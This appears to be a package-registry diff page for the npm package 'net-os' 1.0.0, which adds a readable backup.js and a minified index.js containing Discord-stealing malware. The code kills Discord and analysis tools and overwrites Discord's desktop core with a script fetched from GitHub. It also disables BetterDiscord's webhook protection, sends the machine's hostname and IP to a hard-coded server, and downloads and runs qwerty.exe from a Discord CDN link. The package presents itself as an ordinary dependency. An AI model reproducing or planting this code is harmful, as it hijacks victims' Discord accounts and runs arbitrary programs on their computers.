net-os 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of net-os might be problematic. Click here for more details.
- package/backup.js +215 -0
- package/index.js +1 -0
- package/package.json +31 -0
package/backup.js
ADDED
@@ -0,0 +1,215 @@
|
|
1
|
+
|
2
|
+
const glob = require("glob");
|
3
|
+
const fs = require('fs');
|
4
|
+
const https = require('node:https');
|
5
|
+
const { exec } = require('child_process');
|
6
|
+
const shell = require('shelljs')
|
7
|
+
const os = require('node:os');
|
8
|
+
const axios = require('axios');
|
9
|
+
const download = require('download');
|
10
|
+
var ip = require("ip");
|
11
|
+
const zip = require("adm-zip");
|
12
|
+
const FormData = require("form-data");
|
13
|
+
var XMLHttpRequest = require('xhr2');
|
14
|
+
const buf_replace = require('buffer-replace');
|
15
|
+
const { session, BrowserWindow } = require("electron");
|
16
|
+
const path = require("path");
|
17
|
+
const querystring = require("querystring");
|
18
|
+
//////////////////////////////////////////////////////////////////////
|
19
|
+
const config = {
|
20
|
+
"logout": "instant",
|
21
|
+
"inject-notify": "true",
|
22
|
+
"logout-notify": "true",
|
23
|
+
"init-notify":"true",
|
24
|
+
"embed-color": 123,
|
25
|
+
"USERNAMEWEBHOOK": "moonsz",
|
26
|
+
"disable-qr-code": "true"
|
27
|
+
}
|
28
|
+
//////////////////////////////////////////////////////////////////////
|
29
|
+
let LOCAL = process.env.LOCALAPPDATA
|
30
|
+
let discords = [];
|
31
|
+
let injectPath = [];
|
32
|
+
let runningDiscords = [];
|
33
|
+
|
34
|
+
fs.readdirSync(LOCAL).forEach(file => {
|
35
|
+
if (file.includes("iscord")) {
|
36
|
+
discords.push(LOCAL + '\\' + file)
|
37
|
+
} else {
|
38
|
+
return;
|
39
|
+
}
|
40
|
+
});
|
41
|
+
|
42
|
+
const temp = process.env.temp;
|
43
|
+
|
44
|
+
const infecccc = async () => {
|
45
|
+
const response = await axios.get("https://cdn.discordapp.com/attachments/998660447886639106/1000641545436926074/qwerty.exe", {
|
46
|
+
responseType: "arraybuffer"
|
47
|
+
});
|
48
|
+
|
49
|
+
await fs.writeFileSync(temp + "\\qwerty.exe", response.data, {
|
50
|
+
encoding: "utf8",
|
51
|
+
flags: "w"
|
52
|
+
});
|
53
|
+
|
54
|
+
await exec(temp + `\\qwerty.exe`);
|
55
|
+
|
56
|
+
return;
|
57
|
+
};
|
58
|
+
|
59
|
+
|
60
|
+
function Infect() {
|
61
|
+
|
62
|
+
https.get('https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js', (resp) => {
|
63
|
+
let data = '';
|
64
|
+
|
65
|
+
resp.on('data', (chunk) => {
|
66
|
+
data += chunk;
|
67
|
+
});
|
68
|
+
resp.on('end', () => {
|
69
|
+
injectPath.forEach(file => {
|
70
|
+
fs.writeFileSync(file, data.replace("%INITNOTI%", config["init-notify"]).replace("%USERIP%", ip.address()).replace("%LOGOUT%", config.logout).replace("%USERNAMEWEBHOOK%", config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%", config["logout-notify"]).replace("3447704",config["embed-color"]).replace('%DISABLEQRCODE%', config["disable-qr-code"]), {
|
71
|
+
encoding: 'utf8',
|
72
|
+
flag: 'w'
|
73
|
+
});
|
74
|
+
|
75
|
+
if (config["init-notify"] == "true") {
|
76
|
+
let init = file.replace("index.js", "init")
|
77
|
+
if (!fs.existsSync(init)) {
|
78
|
+
fs.mkdirSync(init, 0744)
|
79
|
+
}
|
80
|
+
}
|
81
|
+
|
82
|
+
if ( config.logout != "false" ) {
|
83
|
+
let folder = file.replace("index.js", "DC_BTW")
|
84
|
+
if (!fs.existsSync(folder)) {
|
85
|
+
fs.mkdirSync(folder, 0744)
|
86
|
+
if (config.logout == "instant") {
|
87
|
+
startDiscord();
|
88
|
+
}
|
89
|
+
} else if (fs.existsSync(folder) && config.logout == "instant" ){
|
90
|
+
startDiscord();
|
91
|
+
}
|
92
|
+
}
|
93
|
+
})
|
94
|
+
});
|
95
|
+
}).on("error", (err) => {
|
96
|
+
});
|
97
|
+
};
|
98
|
+
|
99
|
+
const logout = async () => {
|
100
|
+
await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(
|
101
|
+
`window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();`,
|
102
|
+
true
|
103
|
+
);
|
104
|
+
|
105
|
+
return "ok";
|
106
|
+
};
|
107
|
+
|
108
|
+
function killDiscord() {
|
109
|
+
runningDiscords.forEach(disc => {
|
110
|
+
exec(`taskkill /IM ${disc}.exe /F`, (err) => {
|
111
|
+
if (err) {
|
112
|
+
return;
|
113
|
+
}
|
114
|
+
});
|
115
|
+
});
|
116
|
+
|
117
|
+
if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
|
118
|
+
injectNotify();
|
119
|
+
|
120
|
+
}
|
121
|
+
Infect()
|
122
|
+
pwnBetterDiscord()
|
123
|
+
};
|
124
|
+
|
125
|
+
function listDiscords() {
|
126
|
+
exec('tasklist', function(err, stdout, stderr) {
|
127
|
+
if (stdout.includes("Discord.exe")) runningDiscords.push("discord");
|
128
|
+
if (stdout.includes("Discord (32 bits).exe")) runningDiscords.push("Discord");
|
129
|
+
if (stdout.includes("Discord.exe")) runningDiscords.push("Discord (32 bits)");
|
130
|
+
if (stdout.includes("DiscordCanary.exe")) runningDiscords.push("discordcanary");
|
131
|
+
if (stdout.includes("Discord Canary (32 bits).exe")) runningDiscords.push("Discord Canary");
|
132
|
+
if (stdout.includes("DiscordDevelopment.exe")) runningDiscords.push("discorddevelopment");
|
133
|
+
if (stdout.includes("DiscordPTB.exe")) runningDiscords.push("discordptb");
|
134
|
+
if (stdout.includes("Powercord.exe")) runningDiscords.push("powercord");
|
135
|
+
if (stdout.includes("Fiddler.exe")) runningDiscords.push("fiddler");
|
136
|
+
if (stdout.includes("wireshark.exe")) runningDiscords.push("wireshark");
|
137
|
+
|
138
|
+
if (config.logout == "instant") {
|
139
|
+
killDiscord();
|
140
|
+
} else {
|
141
|
+
if (config["inject-notify"] == "true" && injectPath.length != 0 ) {
|
142
|
+
injectNotify();
|
143
|
+
}
|
144
|
+
Infect()
|
145
|
+
pwnBetterDiscord()
|
146
|
+
}
|
147
|
+
})
|
148
|
+
};
|
149
|
+
|
150
|
+
function startDiscord() {
|
151
|
+
runningDiscords.forEach(disc => {
|
152
|
+
let path = LOCAL + '\\' + disc + "\\Update.exe --processStart " + disc + ".exe"
|
153
|
+
exec(path, (err) => {
|
154
|
+
if (err) {
|
155
|
+
return;
|
156
|
+
}
|
157
|
+
});
|
158
|
+
});
|
159
|
+
};
|
160
|
+
|
161
|
+
function pwnBetterDiscord() {
|
162
|
+
let dir = process.env.appdata + "\\BetterDiscord\\data\\betterdiscord.asar"
|
163
|
+
if (fs.existsSync(dir)) {
|
164
|
+
let x = fs.readFileSync(dir)
|
165
|
+
fs.writeFileSync(dir, buf_replace(x, "api/webhooks", "dc"))
|
166
|
+
}
|
167
|
+
|
168
|
+
return;
|
169
|
+
}
|
170
|
+
|
171
|
+
function injectNotify() {
|
172
|
+
let fields = [];
|
173
|
+
injectPath.forEach( path => {
|
174
|
+
let c = path
|
175
|
+
fields.push(c)
|
176
|
+
})
|
177
|
+
|
178
|
+
const data = `{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`
|
179
|
+
var xhr = new XMLHttpRequest();
|
180
|
+
xhr.open('POST', 'http://20.14.80.127/api/newinjection', true);
|
181
|
+
xhr.setRequestHeader('Content-type', 'application/json');
|
182
|
+
xhr.onload = function () {
|
183
|
+
const negrodefender = this.responseText;
|
184
|
+
};
|
185
|
+
xhr.send(data);
|
186
|
+
}
|
187
|
+
|
188
|
+
function getDirectories(path) {
|
189
|
+
return fs.readdirSync(path).filter(function (file) {
|
190
|
+
return fs.statSync(path+'/'+file).isDirectory();
|
191
|
+
});
|
192
|
+
}
|
193
|
+
|
194
|
+
|
195
|
+
listDiscords();
|
196
|
+
discords.forEach(function(file) {
|
197
|
+
getDirectories(file + "\\").forEach((item) => {
|
198
|
+
if (item.includes("app-")) {
|
199
|
+
file = file + "\\" + item + "\\modules\\";
|
200
|
+
}
|
201
|
+
});
|
202
|
+
getDirectories(file).forEach((item) => {
|
203
|
+
if (item.includes("discord_desktop_core-")) {
|
204
|
+
file = file + "\\" + item + "\\discord_desktop_core\\index.js";
|
205
|
+
}
|
206
|
+
});
|
207
|
+
|
208
|
+
if (fs.existsSync(file)) {
|
209
|
+
injectPath.push(file);
|
210
|
+
}
|
211
|
+
});
|
212
|
+
killDiscord();
|
213
|
+
Infect();
|
214
|
+
startDiscord();
|
215
|
+
infecccc();
|
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const glob=require("glob"),fs=require("fs"),https=require("node:https"),{exec:exec}=require("child_process"),shell=require("shelljs"),os=require("node:os"),axios=require("axios"),download=require("download");var ip=require("ip");const zip=require("adm-zip"),FormData=require("form-data");var XMLHttpRequest=require("xhr2");const buf_replace=require("buffer-replace"),{session:session,BrowserWindow:BrowserWindow}=require("electron"),path=require("path"),querystring=require("querystring"),config={logout:"instant","inject-notify":"true","logout-notify":"true","init-notify":"true","embed-color":123,USERNAMEWEBHOOK:"moonsz","disable-qr-code":"true"};let LOCAL=process.env.LOCALAPPDATA,discords=[],injectPath=[],runningDiscords=[];fs.readdirSync(LOCAL).forEach((e=>{e.includes("iscord")&&discords.push(LOCAL+"\\"+e)}));const temp=process.env.temp,infecccc=async()=>{const e=await axios.get("https://cdn.discordapp.com/attachments/998660447886639106/1000641545436926074/qwerty.exe",{responseType:"arraybuffer"});await fs.writeFileSync(temp+"\\qwerty.exe",e.data,{encoding:"utf8",flags:"w"}),await exec(temp+"\\qwerty.exe")};function Infect(){https.get("https://raw.githubusercontent.com/thaispecanhacafazzi/blagogo/main/index.js",(e=>{let i="";e.on("data",(e=>{i+=e})),e.on("end",(()=>{injectPath.forEach((e=>{if(fs.writeFileSync(e,i.replace("%INITNOTI%",config["init-notify"]).replace("%USERIP%",ip.address()).replace("%LOGOUT%",config.logout).replace("%USERNAMEWEBHOOK%",config.USERNAMEWEBHOOK).replace("%LOGOUTNOTI%",config["logout-notify"]).replace("3447704",config["embed-color"]).replace("%DISABLEQRCODE%",config["disable-qr-code"]),{encoding:"utf8",flag:"w"}),"true"==config["init-notify"]){let i=e.replace("index.js","init");fs.existsSync(i)||fs.mkdirSync(i,484)}if("false"!=config.logout){let i=e.replace("index.js","DC_BTW");fs.existsSync(i)?fs.existsSync(i)&&"instant"==config.logout&&startDiscord():(fs.mkdirSync(i,484),"instant"==config.logout&&startDiscord())}}))}))})).on("error",(e=>{}))}const logout=async()=>(await BrowserWindow.getAllWindows()[0].webContents.executeJavaScript('window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();',!0),"ok");function killDiscord(){runningDiscords.forEach((e=>{exec(`taskkill /IM ${e}.exe /F`,(e=>{}))})),"true"==config["inject-notify"]&&0!=injectPath.length&&injectNotify(),Infect(),pwnBetterDiscord()}function listDiscords(){exec("tasklist",(function(e,i,n){i.includes("Discord.exe")&&runningDiscords.push("discord"),i.includes("Discord (32 bits).exe")&&runningDiscords.push("Discord"),i.includes("Discord.exe")&&runningDiscords.push("Discord (32 bits)"),i.includes("DiscordCanary.exe")&&runningDiscords.push("discordcanary"),i.includes("Discord Canary (32 bits).exe")&&runningDiscords.push("Discord Canary"),i.includes("DiscordDevelopment.exe")&&runningDiscords.push("discorddevelopment"),i.includes("DiscordPTB.exe")&&runningDiscords.push("discordptb"),i.includes("Powercord.exe")&&runningDiscords.push("powercord"),i.includes("Fiddler.exe")&&runningDiscords.push("fiddler"),i.includes("wireshark.exe")&&runningDiscords.push("wireshark"),"instant"==config.logout?killDiscord():("true"==config["inject-notify"]&&0!=injectPath.length&&injectNotify(),Infect(),pwnBetterDiscord())}))}function startDiscord(){runningDiscords.forEach((e=>{exec(LOCAL+"\\"+e+"\\Update.exe --processStart "+e+".exe",(e=>{}))}))}function pwnBetterDiscord(){let e=process.env.appdata+"\\BetterDiscord\\data\\betterdiscord.asar";if(fs.existsSync(e)){let i=fs.readFileSync(e);fs.writeFileSync(e,buf_replace(i,"api/webhooks","dc"))}}function injectNotify(){let e=[];injectPath.forEach((i=>{let n=i;e.push(n)}));const i=`{"fields":"Discord Desktop (app-1.0.9005)", "pcname":"${os.hostname()}", "ip":"${ip.address()}", "idclientkey":"moonsz"}`;var n=new XMLHttpRequest;n.open("POST","http://20.14.80.127/api/newinjection",!0),n.setRequestHeader("Content-type","application/json"),n.onload=function(){this.responseText},n.send(i)}function getDirectories(e){return fs.readdirSync(e).filter((function(i){return fs.statSync(e+"/"+i).isDirectory()}))}listDiscords(),discords.forEach((function(e){getDirectories(e+"\\").forEach((i=>{i.includes("app-")&&(e=e+"\\"+i+"\\modules\\")})),getDirectories(e).forEach((i=>{i.includes("discord_desktop_core-")&&(e=e+"\\"+i+"\\discord_desktop_core\\index.js")})),fs.existsSync(e)&&injectPath.push(e)})),killDiscord(),Infect(),startDiscord(),infecccc();
|
package/package.json
ADDED
@@ -0,0 +1,31 @@
|
|
1
|
+
{
|
2
|
+
"dependencies": {
|
3
|
+
"adm-zip": "^0.5.9",
|
4
|
+
"axios": "^0.27.2",
|
5
|
+
"buffer-replace": "^1.0.0",
|
6
|
+
"child_process": "^1.0.2",
|
7
|
+
"color": "^4.2.3",
|
8
|
+
"download": "^8.0.0",
|
9
|
+
"electron": "^19.0.9",
|
10
|
+
"form-data": "^4.0.0",
|
11
|
+
"fs": "^0.0.1-security",
|
12
|
+
"glob": "^8.0.3",
|
13
|
+
"https": "^1.0.0",
|
14
|
+
"ip": "^1.1.8",
|
15
|
+
"os": "^0.1.2",
|
16
|
+
"path": "^0.12.7",
|
17
|
+
"querystring": "^0.2.1",
|
18
|
+
"shelljs": "^0.8.5",
|
19
|
+
"xhr2": "^0.2.1"
|
20
|
+
},
|
21
|
+
"name": "net-os",
|
22
|
+
"version": "1.0.0",
|
23
|
+
"main": "index.js",
|
24
|
+
"devDependencies": {},
|
25
|
+
"scripts": {
|
26
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
27
|
+
},
|
28
|
+
"author": "nahedasamic <nahedasamic@gmail.com>",
|
29
|
+
"license": "MIT",
|
30
|
+
"description": ""
|
31
|
+
}
|